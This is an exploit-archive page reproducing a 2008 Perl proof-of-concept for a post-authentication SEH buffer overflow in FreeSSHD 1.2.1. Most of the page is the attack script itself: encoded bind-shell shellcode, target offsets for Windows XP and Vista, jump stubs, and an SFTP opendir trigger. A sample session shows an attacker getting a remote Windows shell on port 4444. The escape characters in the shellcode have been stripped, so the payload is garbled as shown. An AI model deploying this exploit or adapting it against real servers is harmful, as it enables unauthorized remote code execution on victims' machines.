FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow

2008-06-08 / 2008-06-09
Credit: Matteo Memelli
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl ############################################################################### # FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/ # # Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709 # # # # Coded by Matteo Memelli aka ryujin # # `Spaghetti & PwnSauce` # # >> http://www.be4mind.com http://www.gray-world.net<< # # # # Tested on Windows XPSp2 EN / Windows Vista Ultimate EN # # Offset for SEH overwrite is 3 Bytes greater in Windows Vista # # Reliable Exploitation needs SSC :) # # # # `I Miss Python but...I Gotta learn some perl too ;)` # # `Cheers to #offsec friends and to my bro s4tan` # ############################################################################### # # # bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2 # # [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow # # [+] Coded by Matteo Memelli aka ryujin # # [+] SSC: Stack Spring Cleaning... >> rm thisJunk << # # [+] Exploiting FreSSHDService... # # [+] Sending Payload... # # [*] Done! CTRL-C and check your shell on port 4444 # # # # bt POCS # nc 10.150.0.2284444 # # Microsoft Windows [Version 6.0.6000] # # Copyright (c) 2006 Microsoft Corporation. All rights reserved. # # # # C:UsersryujinDesktop> # # # ############################################################################### use strict; use Net::SSH2; my $numArgs = $#ARGV + 1; if ($numArgs != 5) { print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGETn"; print "TARGET: 1 -> XPSP2n"; print "TARGET: 2 -> VISTAn"; exit; } # [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes # ExitFunc=SEH my $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e". "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48". "x4ex56x46x42x46x32x4bx38x45x44x4ex33x4bx48x4ex47". "x45x50x4ax37x41x30x4fx4ex4bx58x4fx44x4ax31x4bx58". "x4fx55x42x52x41x30x4bx4ex49x44x4bx48x46x33x4bx38". "x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x48x42x4c". "x46x47x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e". "x46x4fx4bx33x46x55x46x32x4ax42x45x37x45x4ex4bx48". "x4fx35x46x42x41x30x4bx4ex48x46x4bx48x4ex50x4bx34". "x4bx48x4fx45x4ex31x41x50x4bx4ex43x50x4ex42x4bx58". "x49x48x4ex46x46x32x4ex41x41x36x43x4cx41x53x4bx4d". "x46x56x4bx48x43x34x42x43x4bx58x42x44x4ex30x4bx48". "x42x37x4ex41x4dx4ax4bx48x42x54x4ax50x50x45x4ax36". "x50x38x50x54x50x50x4ex4ex42x45x4fx4fx48x4dx48x46". "x43x35x48x46x4ax46x43x43x44x53x4ax46x47x57x43x37". "x44x33x4fx35x46x55x4fx4fx42x4dx4ax46x4bx4cx4dx4e". "x4ex4fx4bx43x42x55x4fx4fx48x4dx4fx55x49x58x45x4e". "x48x36x41x58x4dx4ex4ax50x44x50x45x55x4cx36x44x50". "x4fx4fx42x4dx4ax36x49x4dx49x30x45x4fx4dx4ax47x45". "x4fx4fx48x4dx43x35x43x35x43x45x43x35x43x35x43x54". "x43x35x43x54x43x35x4fx4fx42x4dx48x46x4ax46x41x31". "x4ex35x48x56x43x35x49x48x41x4ex45x39x4ax36x46x4a". "x4cx51x42x37x47x4cx47x45x4fx4fx48x4dx4cx36x42x31". "x41x55x45x35x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x32". "x49x4ex47x45x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d". "x4ax56x45x4ex49x34x48x58x49x54x47x35x4fx4fx48x4d". "x42x45x46x45x46x45x45x45x4fx4fx42x4dx43x59x4ax46". "x47x4ex49x37x48x4cx49x37x47x35x4fx4fx48x4dx45x45". "x4fx4fx42x4dx48x46x4cx46x46x46x48x36x4ax36x43x56". "x4dx46x49x58x45x4ex4cx56x42x55x49x55x49x32x4ex4c". "x49x38x47x4ex4cx46x46x34x49x38x44x4ex41x33x42x4c". "x43x4fx4cx4ax50x4fx44x54x4dx42x50x4fx44x44x4ex52". "x43x39x4dx58x4cx47x4ax43x4bx4ax4bx4ax4bx4ax4ax36". "x44x37x50x4fx43x4bx48x51x4fx4fx45x37x46x54x4fx4f". "x48x4dx4bx45x47x45x44x35x41x45x41x55x41x35x4cx46". "x41x50x41x35x41x35x45x35x41x55x4fx4fx42x4dx4ax36". "x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx56". "x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x45x4ex4f". "x43x48x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d". "x4ax36x42x4fx4cx38x46x30x4fx35x43x35x4fx4fx48x4d". "x4fx4fx42x4dx5a"; my $nops = "x90"x64; my $offset1xp = "x41"x242; my $offset1vi = "x41"x226; my $offset2xp = "x41"x24; my $offset2vi = "x41"x43; my $ppr = "xdex13x40"; my $jmpsxp = "xebxe1x90x90"; my $jmpsvi = "xebxcex90x90"; my $jmpn = "xe9x23xfcxffxff"; my $ip = $ARGV[0]; my $port = int($ARGV[1]); my $user = $ARGV[2]; my $pass = $ARGV[3]; my $payload = ''; if ($ARGV[4] == '1') { $payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmpsxp.$ppr; } elsif ($ARGV[4] == '2') { $payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmpsvi.$ppr; } else { print "[-] TARGET ERROR!n"; exit; } print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflown"; print "[+] Coded by Matteo Memelli aka ryujinn"; print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<n"; # If you start the exploit before any other connection, everything is fine # otherwise exploit could become less reliable. # So let's rm some junk before exploiting our app... for (my $count = 30; $count >= 1; $count--) { my $ssh2 = Net::SSH2->new(); $ssh2->connect($ip, $port) || die "[-] Connnection Failed!"; $ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!"; $ssh2->disconnect(); } my $ssh2 = Net::SSH2->new(); $ssh2->connect($ip, $port) || die "[-] Connnection Failed!"; $ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!"; print "[+] Exploiting FreSSHDService...n"; print "[+] Sending Payload...n"; print "[*] Done! CTRL-C and check your shell on port 4444n"; my $sftp = $ssh2->sftp(); my $bad = $sftp->opendir($payload); exit;

References:

http://seclists.org/fulldisclosure/2008/Jun/0100.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top